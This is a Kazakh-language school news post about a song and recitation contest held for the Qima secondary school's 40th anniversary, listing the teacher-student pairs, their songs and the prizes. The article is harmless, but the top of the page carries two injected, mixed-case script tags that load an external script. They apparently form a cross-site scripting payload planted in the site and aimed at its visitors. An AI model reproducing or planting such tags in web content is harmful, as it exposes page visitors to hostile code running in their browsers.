<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.02.2017

Мерей той жұлдыздарды жандырады

Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 17-ақпан күні мектептің 40 жылдығына арналған шаралар аясында «Мерей той жұлдыздарды жандырады» атты сайыс өткізілді. Мақсаты: ұстаздар мен оқушылар арасындағы қарым-қатынасты нығайту, өскелең ұрпақ бойына туған жеріне, еліне, мектебіне сүйіспеншіліктерін арттыру.

Сайыс шарты бойынша, алтын ұя метебінде қызмет атқарып жүрген ұстаздар білімалушылар арасынан бір оқушыны таңдап, өнерлерін көрсетуге тиіс еді.

Сайысқа 5 жұп қатысып, өнерлерін ортаға салды:

1. Сулеменова Роза Аягановна, мектепалды тобының тәрбиешісі мен 11 «А» сынып оқушысы Турлыгожина Диляра

2. Турлыбекова Тлектес Кабиденовна, технология пәнінің мұғалімі мен 8 «А» сынып оқушысы Блиспекова Перизат

3. Аширханова Ботакөз Куанышпаевна, бастауыш сынып мұғалімі мен 5 «А» сынып оқушысы Қажымұратова Әсем

4. Омарова Асемгуль Бакировна, тәрбие ісінің меңгерушісі мен 7 «А» сынып оқушысы Дарменова Гульназ

5. Турдахунова Айнур Қайроллаевна, педагог-психолог пен 3 «Ә» сынып оқушысы Жәңгір Айсұлу.

1-кезеңде 1-жұп «Атамекен», 2-жұп «Аққулар арманы», 3-жұп «Туған жер»

4-жұп «Алтын бесік», 5-жұп «Туған жер» әндерімен көрермендерді баурап алды.

2-кезеңде 1-жұп «Мен қазақ қыздарына қайран қалам.... », 2-жұп «Әйел бақыты», 3-жұп «Ана, әке», 4-жұп «Мерекем» әндерін орындаса, 5-жұп атынан Айнур Қайроллаевна «Анама» деген өлең жолдарын жан тебірентіп оқыды.

Жұптардың өнерлерін қазақ тілі пәнінің мұғалімі Садвакасова Гульбану Сламияновна мен биология пәнінің мұғалімі Саутбаева Алмагуль Болатовна бағалады. Нәтижесінде, Турдахунова Айнур Қайроллаевна мен Жәңгір Айсұлу «Көрермен көзайымы», Аширханова Ботакөз Куанышпаевна мен Қажымұратова Әсем «Сахна бұлбұлы» номинациясына, 3-орынға Сулеменова Роза Аягановна мен Турлыгожина Диляра, 2-орынға Турлыбекова Тлектес Кабиденовна мен Блиспекова Перизат, 1-орынға Омарова Асемгуль Бакировна мен Дарменова Гульназ ие болды.

Сөйтіп, мерей той жұлдыздарды жандырып, өз мәресіне жетті.

МЕРЕЙ ТОЙ ҚҰТТЫ БОЛСЫН!!!

Просмотров: 710


Пікір қосу



Деректерді қолтаңбаға қосу